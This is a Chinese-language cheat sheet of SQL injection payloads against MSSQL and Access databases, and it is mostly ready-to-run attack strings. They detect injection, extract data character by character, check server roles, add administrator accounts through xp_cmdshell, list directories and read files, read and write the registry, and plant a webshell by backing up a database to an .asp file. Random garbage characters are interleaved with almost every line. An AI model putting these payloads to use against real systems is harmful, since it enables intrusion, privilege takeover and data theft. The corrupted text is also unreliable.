1.判断是否有注入;and 1=1 ;and 1=2 M{�nz~�W80
2.初步判断是否是mssql ;and user>0 {��]Lc�]4J
&�4{%3�w_/
3.注入参数是字符'and [查询条件] and ''=' d�(]LRIn~1
T-<^mX��[}
4.搜索时没过滤参数的'and [查询条件] and '%25'='
�;$|+H"g|
-u8�@ .�
5.判断数据库系统 �?B����h}�
�
�ym${4�
;and (select count(*) from sysobjects)>0 mssql �q�qkZbsN�
]8H;Lg�M2�
;and (select count(*) from msysobjects)>0 access -�lAA,}&+!
�{��J9�9F
8#�kFS�@��
?m~�x%�[Vn
6.猜数据库 ;and (select Count(*) from [数据库名])>0 �z�Gz5��|u
SM^6+L�"BE
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 ]���B5�\S�
O+'Pq,�hn�
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 @�aj"�1��2
5_�`.9@eh.
9.(1)猜字段的ascii值(access) /&kTVuN"(�
�071w��o7�
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 FPcgQ
v;p�
�PE4{;|a }
(2)猜字段的ascii值(mssql) C�?E;sR�r0
@${!C�\([1
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ���F.@yNr"
y r�u�N��5
10.测试权限结构(mssql) 'z�!I#Y!Y
�%!eK"DKG^
x�"N,�oDs�
Zj}DlNk�Vu
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- |d,1�mmv@K
^ro?.,c �T
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- S++}kR�);
ZZe�qOu�7^
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- g5Hs=�c5=\
b�� L�x�V�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ��9Y/c<gbY
HVk3F|��]V
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- �I/Vlw-��
<p�<g�x*%�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- z?yADY�r9�
$'&`k,a3|P
;and 1=(select IS_MEMBER('db_owner'));-- /}M@MbGM�M
Rf�8|-G-}#
�B!��8]�\D
[IHT)%>E8&
11.添加mssql和系统的帐户 (�����jQL?
*��Qyw�
_Q
;exec master.dbo.sp_addlogin username;-- mFo6f\DHr`
;exec master.dbo.sp_password null,username,password;-- ,:,c
ku�l
�#�s��]]\�
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- Q�)Ppx�7)
NIYAcLa@n8
;exec master.dbo.xp_cmdshell 'net user username password �rW1�>��t+
\!631FcQ �
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';--
3g5i5 G\�
qed;��
UyN
;exec master.dbo.xp_cmdshell 'net user username password /add';-- 2 3>lE}^G�
�f[d�wu39k
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- "E'OP���R
Xbap'��/t
v#nFPB=z��
�[�u�-~<80
12.(1)遍历目录 g�0�ug:- R
o}�N�K�qA3
;create table dirs(paths varchar(100), id int) �nkG�� 6�.
Tl��2�5t^Y
;insert dirs exec master.dbo.xp_dirtree 'c:\' -R:�1-0I�$
�� [�bv�.`
;and (select top 1 paths from dirs)>0 �xeu]� X|,
n#x�{~�oQc
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) �3�[8'pQ!&
�#"�f:��m`
F��msg*s7w
�@YT�=��-
(2)遍历目录 %�VwB�
�?�
X?1 �:Z|pJ
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- /�]� R]7��
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 �r��]8B6iV
4RdpR��O�K
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 &#�d;�dcLe
(�M[Kh ��^
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 ��(]�iw#m{
h~F� �uuL�
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 Q�[g%(�(DL
G���q0~&6�
,Q��}/#�/�
qk:F6kL�\`
13.mssql中的存储过程 OP�<@X���z
Oj��<2�_�u
xp_regenumvalues 注册表根键, 子键 ��U��jw�^j
!8P#t{2_�|
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 ch< �zpo:�
B4J^� rz�K
xp_regread 根键,子键,键值名 ?+d�I/jB4X
Y6g[y\*�t�
;exec xp_regread �3�xj<ATSe
9K)OQDv%6D
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 �.Y��h�-m�
�4�6$�u}"E
xp_regwrite 根键,子键, 值名, 值类型, 值 �aY"qE�H7]
(}Gl'.>�\M
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 \8�<bb<�`�
d�)dIIzv��
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 HeF[H\a<��
8�U=M.FFp�
xp_regdeletevalue 根键,子键,值名 "q�wRcuHY�
kQ4%J,�7e4
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 Ij4\*���D!
( XE`,��#�
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 ~A"ODLgU�9
�t�CA �|sN
)V9$ P)��
5*4P_q(AxD
14.mssql的backup创建webshell @$t�����Qz
�~tz[=3!1H
use model LsBDfp5�/�
E9
q�8tE�}
create table cmd(str image); 2��Ie5�0U�
~�1}�N�Qa(
insert into cmd(str) values (''); vwP��516EM
Zso�.�3FR,
backup database model to disk='c:\l.asp'; d�e�TUfbd'
qjTz]'^BpM
Pyk~�V�)~M
ku`�'w;5jT
15.mssql内置函数 v<��;,��x�
r�:YA�n^Lg
;and (select @@version)>0 获得Windows的版本号 W.H_G.C%�
YBg\L$|��n
;and user_name()='dbo' 判断当前系统的连接用户是不是sa ^�hZw�m�8G
t�y/�jTo}�
;and (select user_name())>0 爆当前系统的连接用户 �\r<�&7x#j
�] niWR�l�
;and (select db_name())>0 得到当前连接的数据库 {V:?�����r
q�r6�WSB�c
'3��|�OgV�
^\_`0%�`�>
16.简洁的webshell >-�oa`i�m+
�\�Z57U�NI
use model �~��r|�.GY
9X=#wh,q
create table cmd(str image); e2�Xx7*vS�
m#8KCZ�S��
insert into cmd(str) values (''); �BNaZD�<<�
O|a�v(�F�9
backup database model to disk='g:\wwwtest\l.asp';
